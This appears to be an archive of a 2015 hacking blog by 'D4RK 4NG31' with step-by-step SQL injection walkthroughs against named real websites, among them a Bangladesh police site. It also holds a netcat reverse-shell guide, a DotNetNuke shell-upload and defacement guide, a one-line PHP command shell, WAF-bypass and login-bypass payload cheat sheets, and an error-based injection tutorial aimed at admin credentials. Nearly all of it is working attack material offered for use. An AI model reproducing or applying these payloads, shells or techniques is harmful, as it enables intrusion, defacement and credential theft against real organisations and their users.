Thursday, December 24, 2015

SQLi Challenge Solution 2

Okay First hello to all :p .. The Method is used in this Challenge is Root Privilleges Method.

Okay then let's start :

1. First of all we'll see that site is vuln or not.

http://www.police.gov.bd/content.php?id=275' > Error :D Text disappeared it means it's vuln

2. Now Time to find which comment is working

http://www.police.gov.bd/content.php?id=275 order by 2222222-- > No error It means we've to try now String Based SQLi

http://www.police.gov.bd/content.php?id=275' order by 222222--+ > Error :D its working

2. Now We've to Dump Vuln Columns

http://www.police.gov.bd/content.php?id=275' order by 20--+ > error
http://www.police.gov.bd/content.php?id=275' order by 15--+ > No error
http://www.police.gov.bd/content.php?id=275' order by 17--+ > Error
http://www.police.gov.bd/content.php?id=275' order by 16--+ > No error

So, Total Columns are 16.

Now We've to dump Columns.

http://www.police.gov.bd/content.php?id=275' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--+ > Vuln Columns is 3

3. Now we've to see that Website have root privilleges or not.

To see it we've to use this query.

(SELECT+GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTABLE,0x3c62723e)+FROM+INFORMATION_SCHEMA.USER_PRIVILEGES)

Use it in vuln column.

http://www.police.gov.bd/content.php?id=275' union select 1,2,(SELECT+GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTABLE,0x3c62723e)+FROM+INFORMATION_SCHEMA.USER_PRIVILEGES),4,5,6,7,8,9,10,11,12,13,14,15,16--+

Yeahhhh :D it's showing root@localhost > Yes it means We've Root Privilleges access.

4. Now We've to Check website path for Upload shell

Users path exist in passwd file So, we'll load that file to see the path. For this we'll use following command :

load_file('/etc/passwd')

http://www.police.gov.bd/content.php?id=275' union select 1,2,load_file('/etc/passwd'),4,5,6,7,8,9,10,11,12,13,14,15,16--+

:'( No luck no path there

5. If You can't able to find the path then remember tmp dir is always writable ^_^

To Upload file in tmp folder we'll use following Command

into outfile '/tmp/test.txt'

http://www.police.gov.bd/content.php?id=275' union select 1,2,'Testing',4,5,6,7,8,9,10,11,12,13,14,15,16 into outfile '/tmp/test.txt'--+

6. To Open your uploaded file We'll use load_file

http://www.police.gov.bd/content.php?id=275' union select 1,2,load_file('/tmp/test.txt'),4,5,6,7,8,9,10,11,12,13,14,15,16--+

Wahoooooo :)))) It's working .....

Hope You like my tutorial ( Solution of 2nd Challenge ) .

#D4RK_4NG31

Posted by at No comments:

Sunday, December 13, 2015

BackConnect Without Router

Hello Guys ! I know many people wants to root server but their internet don't forward port :)

But Now you can BackConnect with any Internet Connections.

So, Just Follow me :-

1. Make account on koding.com

2. Build VM It'll take time.

3. Upload NetCat with wget Function in Terminal. Command : wget -O netcat.zip http://anonpirates.ml/netcat-1.11.zip

4. Now Unzip netcat with this command : unzip netcat.zip
" Hurray ! We Install NetCat successfully :) "

5. Now execute this command : nc -lvp 1337

6. Now You'll see written " koding-vm-0 " in top left and in that option You'll see settings button.








7. Click on settings button and There You'll see Public IP,Copy that IP.

8. Now goto that Server in which you want to backconnect

9. Click on Network ( WSO Shell ) And now Paste Public IP in IP and Write 1337 in port and then click on connect.

10.Now go back to VM to see that it's connected or not. Execute this command : ls ( to check )

Yahooooooooo ! :D We Successfully BackConnect the server

Hope You Like my tutorial. Thanks to Kashmiri Cheetah

#D4RK_4NG31

Posted by at 3 comments:

Wednesday, November 4, 2015

Routed SQLi Method

Hey Guys ! Hope You all are fine today :p

Now I'm going to teach you SQLi Routed Query method.

So, Let's start.

First we've to find vuln columns of target website .

web.com/index.php?id=1' union select 1,2,3,4,5--+

Sadly No Vuln Columns is appearing :\

Let's check in source

view-source:http://web.com/index.php?id=1' union select 1,2,3,4,5--+

:( Again no vuln columns is appearing. :) So, it's time to use Routed Query method to dump vuln column.

Let's find vuln column in which we can use routed SQLi method.

To find vuln columns. We'll use 0x27 = '

web.com/index.php?id=1' union select 1,2,3,4,0x27--+ > No error
web.com/index.php?id=1' union select 1,2,3,0x27,5--+ > No error
web.com/index.php?id=1' union select 1,2,0x27,4,5--+ > No error
web.com/index.php?id=1' union select 1,0x27,3,4,5--+ > Error
web.com/index.php?id=1' union select 0x27,2,3,4,5--+ > No Error

Horray ! :D .. We've fine the Vuln columns and it is 2.
Now , we've to use Routed SQLi Query

In this query we've to first put and false before union select & "1" in vuln column where " is for query and 1 is the injection point
Hope You know that Query without injection point never works. So, Let's begin

Time to find Columns

web.com/index.php?id=1' and false union select 1,"1 order by 1",3,4,5--+ > No error
web.com/index.php?id=1' and false union select 1,"1 order by 2",3,4,5--+ > No error
web.com/index.php?id=1' and false union select 1,"1 order by 5",3,4,5--+ > No error
web.com/index.php?id=1' and false union select 1,"1 order by 6",3,4,5--+ > Error

So, Columns are 6 :D

Let's dump vuln columns

web.com/index.php?id=1' and false union select 1,"1 union select 1,2,3,4,5,6",3,4,5--+

:D yeaahhhhhhhh... Vuln columns is appearing.

Hope You like my tutorial ;)
#D4RK_4NG31
Posted by at No comments:

Admin Panel Bypass

:) Hello Guys ! Today I'm going to teach you admin panel bypass.

So, let's start

:D You can bypass 68% Admin Panels with this

/admin/dashboard.php
/admin/home.php
/admin/admin.php
/admin/welcome.php
/admin/admin_index.php
/admin/admin_home.php
/admin/admin_main.php
/admin/main.php

If this not working You can try SQLi authentication bypass in other tutorials.
Hope You like my tutorial ;)
#D4RK_4NG31
Posted by at 1 comment:

SQLi Comments

%23
--
--+
--+-
;

WORK :
1'%23
1 --
1' --+
1' --+-
1' ;
Posted by at 1 comment:

Tuesday, September 29, 2015

SQLi Challenge Solution 1

First Hello to all :) from D4RK 4NG31

Target : http://exoticindiatours.in/pckge-details.php?id=2

Now, Let's Start

Finding which comment is working

http://exoticindiatours.in/pckge-details.php?id=2' --+ ====> error
http://exoticindiatours.in/pckge-details.php?id=2 --   ====> no error it's mean comment (--) is working..

-- = # mostly

So, we don't have to use any comment :))

Now it's time to find columns

First we'll use order by

http://exoticindiatours.in/pckge-details.php?id=2 order by 122 ====> Blocked

order by function is blocked.. so, we'll use group by instead of order by

http://exoticindiatours.in/pckge-details.php?id=2 group by 122 ====> showing error it's mean it's working :D

http://exoticindiatours.in/pckge-details.php?id=2 group by 2 ====> Error

http://exoticindiatours.in/pckge-details.php?id=2 group by 1 ====> No error

So, The vuln column is 1

Now, time to use union select

http://exoticindiatours.in/pckge-details.php?id=2 union select 1 ===> Blocked
http://exoticindiatours.in/pckge-details.php?id=2 /*!50000union*/ /*!50000select*/ ====> again blocked

seems Site block special chars (*,!)

Now It's time to do encryption.

For this we'll use union(select

In this .. We'll type columns like this " union(select (1),(2),(3),(4),(5))

Let's try..

http://exoticindiatours.in/pckge-details.php?id=2 union(select (1)) ====> :)) working....

Now it's time to use DIOS

as i already told u concat func is used for print multiple queries

http://exoticindiatours.in/pckge-details.php?id=2 union(select (concat(version(),database(),user()))

We get an error... seems site is blocking ( , ) comma

To bypass we'll use variable method :

and@x:=

Let's try this :

http://exoticindiatours.in/pckge-details.php?id=2 and@x:=concat(version(),database(),user()) union(select (@x))

again error

Let's try Waf. First we'll see which word is blocking site :

http://exoticindiatours.in/pckge-details.php?id=2 and@x:=concat====(version(),database(),user()) union(select (@x)) ===> No error

Concat( = Blocked

For this we'll use + with great amount

Let's do it:

http://exoticindiatours.in/pckge-details.php?id=2 and@x:=concat+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++(0x3c703e496e6a6563746564206279204434524b20344e4733313c2f703e,0x3c62723e,version(),0x3c62723e,database(),0x3c62723e,user())+UNION(SELECT(@x))#

Done :) Happy Injecting ;) Tutorial by D4RK 4NG31

Posted by at No comments:

Easy and Simple Way to make DIOS

First We'll Print Our Cyber name

To use html tags we'll use them between apostrophes ( ' ) like '<p>Injected by D4RK 4NG31</p>'

And we'll use Concat function for multiple queries

So, Let's Start..

Concat('<h2>Injected by D4RK 4NG31</h2>') :D Done

Now For Print Version,Database,User .... We'll use these commands @@version,database(),user() and will use <br> for new line :)

Concat('<h2>Injected by D4RK 4NG31</h2>','<p>Version ::</p>',@@version,'<br>','<p>Database ::</p>',database(),'<br>','<p>User ::</p>',user(),'<br>')

Done :D we've printed all things now it's time to print tables and columns

Now for this we'll use this query

(select group_concat(column_name,'<br>',table_name) from information_schema.columns where table_schema=database())

Now add this query in DIOS

Concat('<h2>Injected by D4RK 4NG31</h2>','<p>Version ::</p>',@@version,'<br>','<p>Database ::</p>',database(),'<br>','<p>User ::</p>',user(),'<br>',(select group_concat(column_name,'<br>',table_name) from information_schema.columns where table_schema=database()))

HTML tags into hex :

Concat(0x3c68323e496e6a6563746564206279204434524b20344e4733313c2f68323e,0x3c703e56657273696f6e203a3a203c2f703e,@@version,0x3c62723e,0x3c703e4461746162617365203a3a3c2f703e,database(),0x3c62723e,0x3c703e55736572203a3a3c2f703e,user(),0x3c62723e,(select group_concat(column_name,0x3c62723e,table_name) from information_schema.columns where table_schema=database()))

DIOS completed now Happy Injecting :)))

Tutorial by D4RK 4NG31 ;)
Posted by at No comments:

DNN ( DotNetNuke ) Website Hacking


How To Hack Websites Using DotNetNuke Exploit + Shell Uploading
Hello everyone!! Previously we have discussed about "How to Hack Website Using Havij SQL Injection". Today,I am going to tell about one more very usefull but old method which you can used to hack website using Dot net nuke(DNN) exploit. I know some of you know about this method DNN but it is very good exploit to hack dot net sites. B
y using this DNN exploit, you can even hack all sites which are hosted on same server. Also you can upload any file using it. It is easy method as compared to other hacking attacks such as SQL-Injection and Cross Site Scripting etc.
What is DNN (Dot Net Nuke) ?
DotNetNuke is an open source platform for building web sites based on Microsoft .NET technology. DotNetNuke is mainly provide Content Management System(CMS) for the personal websites.
Step 1: First go to google.com search page and use this following dork to find vulnerable site.
inurl:home/tabid/36/language/en-US/Default.aspx
another dorks you can use
inurl:fcklinkgallery.aspx
inurl:/portals/0
Step 2: Now open any site from the search list like
http://www.vulsite.com/…/tab…/36/language/en-US/Default.aspx
Now replace "home/tabid/36/language/en-US/Default.aspx" with Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
so your url will become
http://www.vulsite.com/…/HtmlEditor…/Fck/fcklinkgallery.aspx
then hit enter
Step 3: Now there are 2 possibilities
if u get Link Gallery url select then site is not vulnerable , see the image below :
http://1.bp.blogspot.com/…/nGf…/s1600/website%2Bhacking1.jpg
and If you get Like shown in below image then target is vulnerable :
http://3.bp.blogspot.com/…/r3g…/s1600/website%2Bhacking2.jpg
ok now if you find a vulnerable site move to next step
Step 4: Now you can see 3 options there and we neeed to select “File in your site”.
http://3.bp.blogspot.com/…/29B…/s1600/website%2Bhacking3.jpg
Step 5: Now after selecting 3 options, we need to use a javascript code. For that we need to use that browser which supports javascript. So i use Opera Mini .
Before using javascript, first we need to choose file location as root, after that clear everything written on browser url and paste the below javascript only.
javascript:__doPostBack('ctlURL$cmdUpload','')
Step 6: After inject the above javascript code in browser address bar, you will get upload option instead of selection option.
http://2.bp.blogspot.com/…/dOg…/s1600/website%2Bhacking4.jpg
Step 7: Now you have to upload your shell.
Note : But remember you cant upload your shell directly in .php format and not even you can do anything by uploading .php.jpg
So for this purpose first we need to upload a special type of shell which is specially coded in asp.
Download the shell :- goto www.sh3ll.org .
Now rename your asp shell to
yourshell.asp;.jpg
and upload it.
After uploading you can access your ASP shell by going to this address,
http://www.vulsite.com/portals/0/yourshell.asp;.jpg
http://4.bp.blogspot.com/…/crr…/s1600/website%2Bhacking0.jpg
Step 8: Now upload your php shell using upload file option marked in above image.
After uploading php shell you can access it by going to this address,
http://www.vulsite.com/portals/0/yourphpshell.php
Step 9: Now replace your index.html with original index.html. Thats it.
Well you can also hack all sites which are hosted on same server.
For that follow the bellow image and click on Drives you will find all sites hosted on same server.
Click on any one site and follow the above process to upload you shell.
Happy website hacking!!!
—————————————-
# D4RK 4NG31
—————————————-
Posted by at 1 comment:

WAF Bypass Cheat Sheet


WAF Bypass Cheat Sheet

Union Select
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
+/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
+/*!u%6eion*/+/*!se%6cect*/+
/**/uniUNIONon/**/aALLll/**/selSELECTect/**/
1%')and(0)union(select(1),version(),3,4,5,6)%23%23%23
/*!50000%55nIoN*/+/*!50000%53eLeCt*/
union /*!50000%53elect*/
%55nion %53elect
+--+Union+--+Select+--+
+UnIoN/*&a=*/SeLeCT/*&a=*/
id=1+?UnI?On?+'SeL?ECT?
id=1+'UnI'||'on'+SeLeCT'
UnIoN SeLeCt CoNcAt(version())--
uNiOn aLl sElEcT
uUNIONnion all sSELECTelect
/*union*/union/*select*/select+1,2,3/*
/*uniXon*/union/*selXect*/select+1,2/*
un/**/ion+sel/**/ect
+#1q%0Aunion all#qa%0A#%0Aselect
union /*!select*/+
union/**/select/**/
/**/union/**/select/**/
/**/union/*!50000select*/
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/uniUNIONon/**/selSELECTect/**/
/**/uniUNIONon/**/aALLll/**/selSELECTect/**/
/**//*!union*//**//*!select*//**/
/**/UNunionION/**/SELselectECT/**/
/**//*UnIOn*//**//*SEleCt*//**/
/**//*U*//*n*//*I*//*O*//*n*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
/**/UNunionION/**/all/**/SELselectECT/**/
/**//*UnIOn*//**/all/**//*SEleCt*//**/
/**//*U*//*n*//*I*//*O*//*n*//**//*all*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
uni
%20union%20/*!select*/%20
union%23aa%0Aselect
union+distinct+select+
union+distinctROW+select+
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%23sexsexsex%0AUnIOn%23sexsexsex%0ASeLecT+
/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
/*!u%6eion*/+/*!se%6cect*/+
1%?)and(0)union(select(1),version(),3,4,5,6)%23%23%23
/*!50000%55nIoN*/+/*!50000%53eLeCt*/
union /*!50000%53elect*/
+%2F**/+Union/*!select*/
%55nion %53elect
+?+Union+?+Select+?+
+UnIoN/*&a=*/SeLeCT/*&a=*/
uNiOn aLl sElEcT
uUNIONnion all sSELECTelect
union(select(1),2,3)
union (select 1111,2222,3333)
union (/*!/**/ SeleCT */ 11)
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*?*//*!all*//*?*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect 1,2,3,4,5,6,7,8,9,10%0A#a
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
id=1+?UnI?On?+?SeL?ECT?
id=1+?UnI?||?on?+SeLeCT?
union select 1?+%0A,2?+%0A,3?+%0A etc ?
/*!00000Union*/ /*!00000Select*/
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion %53elect
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+ #?uNiOn + #?sEleCt
+ #?1q %0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+?UnI?On?+'SeL?ECT?
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+
Union Select  by PASS with Url Encoded Method:
%55nion(%53elect)
union%20distinct%20select
union%20%64istinctRO%57%20select
union%2053elect
%23?%0auion%20?%23?%0aselect
%23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect
%55nion %53eLEct
u%6eion se%6cect
unio%6e %73elect
unio%6e%20%64istinc%74%20%73elect
uni%6fn distinct%52OW s%65lect
%75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%7

Cheat Sheet of Bypassing Of Order by And Group By


 order by/**_**/
/*!12345order*/ /*!12345by*/
) order by 1-- -
') order by 1-- -

')order by 1%23%23

%')order by 1%23%23

Null' order by 100--+

Null' order by 9999--+

')group by 99-- -

'group by 119449-- -

'group/**/by/**/99%23%23




Concat And Group_concat By Pass cheat Sheet ::



/*!12345group_concat*/(/*!12345table_name*/)
/*!50000group_concat*/(/*!50000table_name*/)
/*!GrOuP_ConCaT*/()
/*!12345GroUP_ConCat*/()
/*!50000gRouP_cOnCaT*/()
/*!50000Gr%6fuP_c%6fnCAT*/()
/*!group_concat*/()
gRoUp_cOnCAt()
group_concat(/*!*/)
group_concat(/*!12345table_name*/)
group_concat(/*!50000table_name*/)
/*!group_concat*/(/*!12345table_name*/)
/*!group_concat*/(/*!50000table_name*/)
unhex(hex(group_concat(table_name)))
unhex(hex(/*!group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(table_name)))
unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
unhex(hex(/*!50000group_concat*/(table_name)))
unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
CONVERT(group_concat(table_name)+USING+latin1)
CONVERT(group_concat(table_name)+USING+latin2)
CONVERT(group_concat(table_name)+USING+latin3)
CONVERT(group_concat(table_name)+USING+latin4)
CONVERT(group_concat(table_name)+USING+latin5)
convert(group_concat(table_name)+using+ascii)
convert(group_concat(/*!table_name*/)+using+ascii)
convert(group_concat(/*!12345table_name*/)+using+ascii)
convert(group_concat(/*!50000table_name*/)+using+ascii)
/*!concat_ws(0x3a,)*/
concat_ws(0x3a3a3a,version()
CONCAT_WS(CHAR(32,58,32),version(),)

How to By Pass Tables:::
group_concat(/*!table_name*/)

+/*!froM*/ /*!InfORmaTion_scHema*/.tAblES? -

/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*//*!TaBle_ScHEmA*/=schEMA()?
/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()? -
How to By Pass Columns:::
group_concat(/*!column_name*/)
+/*!froM*/ InfORmaTion_scHema.cOlumnS /*!WheRe*/ /*!tAblE_naMe*/=hex table
/*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table/*!froM*/ table? -


URL enCoded By passing Table and columns::
(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA())
(select+group_concat(/*!column_name*/)+/*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table)
like
http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()),4,5 ?

illegal mix of Collations ByPass ::

unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name)))
/*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)

http://www.marinaplast.com/page.php?id=-13 union select 1,2,unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))),4,5 /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)?
Posted by at No comments:

SQLi Authentication Bypass Cheat Sheet


or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
Posted by at No comments:

Create Your CMD


We've to create CMD.. Let's Start . Follow these steps

1. Open Notepad

2. Paste this Code :
<?if($_GET['dark']){echo"<pre>".shell_exec($_GET["dark"]);}?>


3. Now Save it as with name "cmd.php"




4. Now upload it in website




5. Successfully Uploaded :))




6. Now we use this Command to test cmd is working or not. "cmd.php?dark=ls" where "cmd" is file name and "dark" is parameter and "ls" is to check how many files contain in current directory. If it's showing multiple files name then It means CMD is working.... :)))) 




Happy Hacking !






Hope You Like D4RK 4NG31 tutorial ;)











Posted by



at





No comments:
  











































ERROR BASED / DOUBLE QUERY Injection















Difficulty: Intermediate Level 2 and Advanced

Requirements: Patience,intuition and understanding

Estimated time to read the chapter: 10-20 min (reading thoroughly will help you understand better)

Previous Chapters:

Chapter1: How to use/create dorks

Chapter2:Basic SQL injection using login queries

Chapter3: Detailed Union/Normal Based SQL injection



Alright I'll make this tutorial as short as possible so that you can understand faster.







Understanding Error Based/Double Query

How does Error Base and Double Query work

Error Based:





Code:



A method of extracting information from a database when UNION SELECT function does not work at all. This can be done using a compiled query to extract the database information



Double Query:





Code:



Basically like Error Based, except that the Error Based Query will be doubled as a single query statement so that we'll get errors with information in it



I'll explain further in this tutorial

Anyways, focus on this part of this tutorial

Error Based IS Double Query

Error Based = Double Query (Error based 2x)







How do you know you should use Error Based/Double Query? (Important!)

This is the most important part of web hacking; the type of injection to use in different situations.

You can use Error Based/ Double Query Injections in the following errors you get





Code:



a. The Used Select Statements Have  Different Number Of Columns.
b. Unknown Column 1 or no columns at all (in webpage and page source)
c.Error #1604



Now take note of those errors. You'll be needing it







Lets start with Error Based SQL injection

Alright for this lesson, we'll use this site as an example:

http://www.aliqbalschools.org



First approach is knowing the version of the database



To do that we enter this query after the end of the URL





Code:



or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--





So the site will look like this





Code:



http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--





Results:

[Image: TIqze.png]

Now that we know the version of the database which is 5, lets move to the next step







Second step: Getting the database name

To get the database, we enter this query





Code:



and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)



Notice the limit function in the query
A website can have more than 2 two databases, so increase the limit until you find all database names
Example: limit 0,1 or limit 1,1 or limit 2,1



Now our website address will look like this





Code:



http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)





Results:

[Image: BmmpO.png]

Database is : iqbal_iqbal



Second step is done where we extract the database names we need.

MAKE sure you write the database name on a paper or notepad

We'll need it later







Third Step: Getting the TABLE NAMES

Table names is what we need now

Here's the query we can use:





Code:



and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)



Don't also forget the LIMIT function we used here to get table names one by one



Alright our web address will look like this:





Code:



http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 19,1),floor(rand(0)*2))x from information_schema.tables group by x)a)





Now here's the important part:

When you search for tables keep incrementing the limit until you find the valuable table name

For example: LIMIT 0,1

LIMIT 1,1

LIMIT 2,1

Keep increasing the number until you find the table you want to extract the information from

Here's the formula: LIMIT N,1 where N is a random integer



Valuable Tables can be:





Code:



Users
Admin
user
administrator
tbladmin
tblusers
settings



In this case, we have the table "settings"

So now we know our table, lets move on to the next step







Fourth Step: Getting Columns from specific TABLE NAMES

Alright, now that you've chosen the table you wanna extract columns from, time to execute another query

So here's how a column query extraction will look like:





Code:



and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xTABLEHEX limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)



Notice the LIMIT 0,1 FUNCTION and 0xTABLEHEX

You need to convert your specific table into hex and add 0x at the beginning of the string so that it can be readable to the website

To convert a string to hex use: http://www.swingnote.com/tools/texttohex.php

Here's how the address will look like along with the query





Code:



http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)





Results:





Code:



Duplicate entry 'Id~1' for key 'group_key





Now you need to increment the limit until you find valuable columns such as userName and passWord.

So in this case,

Column name = userName





Code:



http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)





Column name= passWord





Code:



http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)



[Image: kNbNI.png]

Again, don't forget to see the LIMIT Function

Now that we found the columns we want to extract information from i.e "userName" and "passWord", lets proceed to the next step where we can actually get the login username and password







Fifth Step: Extracting the data from Columns

Alright this part is probably the best in SQL injecting site.

Time to get the info from the columns we have

To do that, use this query





Code:



and (select 1 from (select count(*),concat((select(select concat(cast(concat(COLUMN_NAME,0x7e,COLUMN_NAME) as char),0x7e)) from Databasename.TABLENAME limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)



Now before you proceed, watch and focus on the code and study what happens.

Here we have 4 variables:

1. COLUMN_NAME: where you insert the column name you want to extract information from

2.Databasename: where you insert the current database name of the website so that you'll be extract info from it

3. TABLENAME: where you insert the table name of the column names you extracted from

